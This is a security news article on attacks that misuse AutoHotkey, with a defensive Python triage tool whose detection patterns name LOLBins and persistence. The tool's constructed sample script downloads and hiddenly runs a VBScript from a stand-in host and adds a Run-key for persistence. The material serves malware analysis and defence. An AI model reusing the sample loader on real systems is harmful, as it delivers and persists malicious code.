SecurityIntelligence researchers have analyzed recent living-off-the-land attacks involving misuse of AutoHotkey, and published a report explaining how organizations can prevent them.
A living-off-the-land attack abuses tools that are already present on the victim's system. Instead of installing additional malware, attackers use the legitimate, often signed, utilities already on the host, so their activity blends in with normal administration and is less likely to tip off security software.
Several threat actors have used living-off-the-land techniques to infiltrate victims. A group called Gallmaker abused the Microsoft Office Dynamic Data Exchange (DDE) protocol in 2018 to spy on its targets. Other attackers misused the Windows Management Instrumentation Command-line tool (WMIC) to deliver the fileless Astaroth info-stealer.
This time around, attackers misused AutoHotkey. AutoHotkey is an open-source scripting language and interpreter for Windows that lets users create hotkeys and macros to automate repetitive tasks in their applications. Its scripts can also be compiled into standalone executables, which is part of what makes it attractive to attackers: a compiled script looks like an ordinary program while carrying the attacker's logic inside.
The campaign SecurityIntelligence detailed began in mid-May 2021. It used an AutoHotkey-compiled script to deliver a remote access Trojan: the script loaded an executable that in turn dropped several VBScripts and malware payloads, including VjW0rm, Houdini and HCrypt.
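A defender triaging an AutoHotkey-compiled loader such as the one described above can often recover the script without running it. The following Python helper is an added example and is not code from SecurityIntelligence or from the AutoHotkey project. It assumes the AutoHotkey v1 Ahk2Exe layout, in which the script source is stored in the clear as a PE resource named ">AUTOHOTKEY SCRIPT<" (the name appears in the binary as UTF-16LE), and that the binary has not been packed. The scoring table of suspicious commands and the sample "binary" it scans are constructed for illustration.

```python
"""Triage helper for AutoHotkey-compiled executables (added example).

Assumptions (not from the original article):
  * AutoHotkey v1 Ahk2Exe output: the script text is embedded in the clear as
    a resource named ">AUTOHOTKEY SCRIPT<" (stored UTF-16LE in the PE).
  * The binary is not packed, so the script is recoverable as a printable run.
"""
import re
from typing import Dict, Iterator, List, Tuple

# Resource name Ahk2Exe (AutoHotkey v1) uses for the embedded script.
AHK_RESOURCE_NAME = ">AUTOHOTKEY SCRIPT<".encode("utf-16-le")

# Hypothetical scoring table: AutoHotkey commands that typically matter in a
# loader. Weights are illustrative, not a vendor's detection logic.
SUSPICIOUS_PATTERNS: Dict[str, Tuple[str, int]] = {
    r"^\s*UrlDownloadToFile\b": ("downloads a file from the internet", 3),
    r"^\s*Run\b.*\b(powershell|wscript|cscript|cmd|mshta|regsvr32|rundll32)\b":
        ("spawns a script host or LOLBin", 3),
    r"ComObjCreate\s*\(\s*\"(WScript\.Shell|MSXML2\.XMLHTTP|ADODB\.Stream)\"":
        ("creates a scripting/HTTP COM object", 2),
    r"^\s*RegWrite\b.*\\CurrentVersion\\Run\b": ("Run-key persistence", 3),
    r"^\s*FileInstall\b": ("drops an embedded file", 2),
    r"\bDllCall\s*\(": ("calls native Win32 APIs", 1),
    r"^\s*#NoTrayIcon\b": ("hides the tray icon", 1),
    r"^\s*Sleep\s*,?\s*\d{5,}": ("long sleep (sandbox evasion)", 1),
}
_COMPILED = {re.compile(p, re.IGNORECASE | re.MULTILINE): v
             for p, v in SUSPICIOUS_PATTERNS.items()}


def is_compiled_ahk(data: bytes) -> bool:
    """True if data looks like a PE image carrying the Ahk2Exe script resource."""
    return data.startswith(b"MZ") and AHK_RESOURCE_NAME in data


def carve_text_runs(data: bytes, min_len: int = 64) -> Iterator[str]:
    """Yield runs of printable ASCII (plus tab/CR/LF) at least min_len bytes long."""
    pattern = rb"[\x09\x0a\x0d\x20-\x7e]{%d,}" % min_len
    for m in re.finditer(pattern, data):
        yield m.group().decode("ascii")


def score_ahk_script(text: str) -> Tuple[int, List[str]]:
    """Score script text against the table; each pattern counts at most once."""
    score, findings = 0, []
    for rx, (why, weight) in _COMPILED.items():
        if rx.search(text):
            score += weight
            findings.append(why)
    return score, findings


def triage(data: bytes) -> dict:
    """Report whether data is a compiled AHK binary and the worst carved script."""
    best_score, best_findings, best_text = 0, [], ""
    for run in carve_text_runs(data):
        score, findings = score_ahk_script(run)
        if score > best_score:
            best_score, best_findings, best_text = score, findings, run
    return {"compiled_ahk": is_compiled_ahk(data), "score": best_score,
            "findings": best_findings, "script": best_text}


# Constructed sample script mimicking a downloader/loader; not a real sample.
SAMPLE_SCRIPT = """#NoTrayIcon
#Persistent
UrlDownloadToFile, https://example.invalid/stage2.vbs, %A_Temp%\\stage2.vbs
Run, wscript.exe "%A_Temp%\\stage2.vbs",, Hide
RegWrite, REG_SZ, HKCU, Software\\Microsoft\\Windows\\CurrentVersion\\Run, Updater, %A_ScriptFullPath%
Sleep, 120000
"""


def build_sample_binary() -> bytes:
    """Constructed stand-in for a compiled script: DOS magic, non-printable
    filler, the resource name, and the script body in the clear (UTF-8 BOM
    first, as Ahk2Exe writes it). It is not a valid PE file."""
    return (b"MZ" + b"\x90" * 64 + b"\x00" * 16 + AHK_RESOURCE_NAME
            + b"\x00" * 32 + b"\xef\xbb\xbf" + SAMPLE_SCRIPT.encode("utf-8")
            + b"\x00" * 16)


if __name__ == "__main__":
    report = triage(build_sample_binary())
    print("compiled AutoHotkey:", report["compiled_ahk"])
    print("score:", report["score"])
    for finding in report["findings"]:
        print(" -", finding)
    print("--- recovered script ---")
    print(report["script"])
```

On a real file, `triage(open(path, "rb").read())` gives an analyst the recovered script and a first-pass list of why it matters; if the binary was packed, `is_compiled_ahk` will be false and nothing useful will be carved, which is itself a signal to unpack first.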
This is not the first time attackers misused AutoHotkey.
One of the earliest known attacks using AutoHotkey was a credential stealer discovered in March 2018. Dubbed Fauxpersky, it was disguised as Kaspersky Antivirus and spread via USB drives; its keylogger captured keystrokes and other sensitive input, sent it to the attackers, and copied itself to any other removable media it found.
In December 2020, a malicious Excel file was found whose VBA AutoOpen macro dropped a legitimate AutoHotkey script compiler executable together with a malicious AutoHotkey script and then ran it. The operation profiled the victims, harvested their credentials, and exfiltrated them to the attackers.
Two months later, Cofense detected two phishing emails targeting Spanish users. Their payload combined a legitimate AutoHotkey compiler executable, a malicious AutoHotkey script, and the Mekotio banking Trojan delivered as a DLL. Mekotio displayed fake login pages for the targeted banks and monitored the clipboard for bitcoin addresses, replacing them with attacker-controlled ones.
SecurityIntelligence researchers conclude that these campaigns highlight the need for organizations to implement policies that prevent attacks relying on AutoHotkey scripts.
With proper training, the researchers say, employees will be better able to avoid falling victim to phishing emails and similar lures. Organizations should also inventory which applications and tools are actually required for day-to-day work and block or remove the rest, so that a scripting interpreter such as AutoHotkey cannot run where it has no business purpose.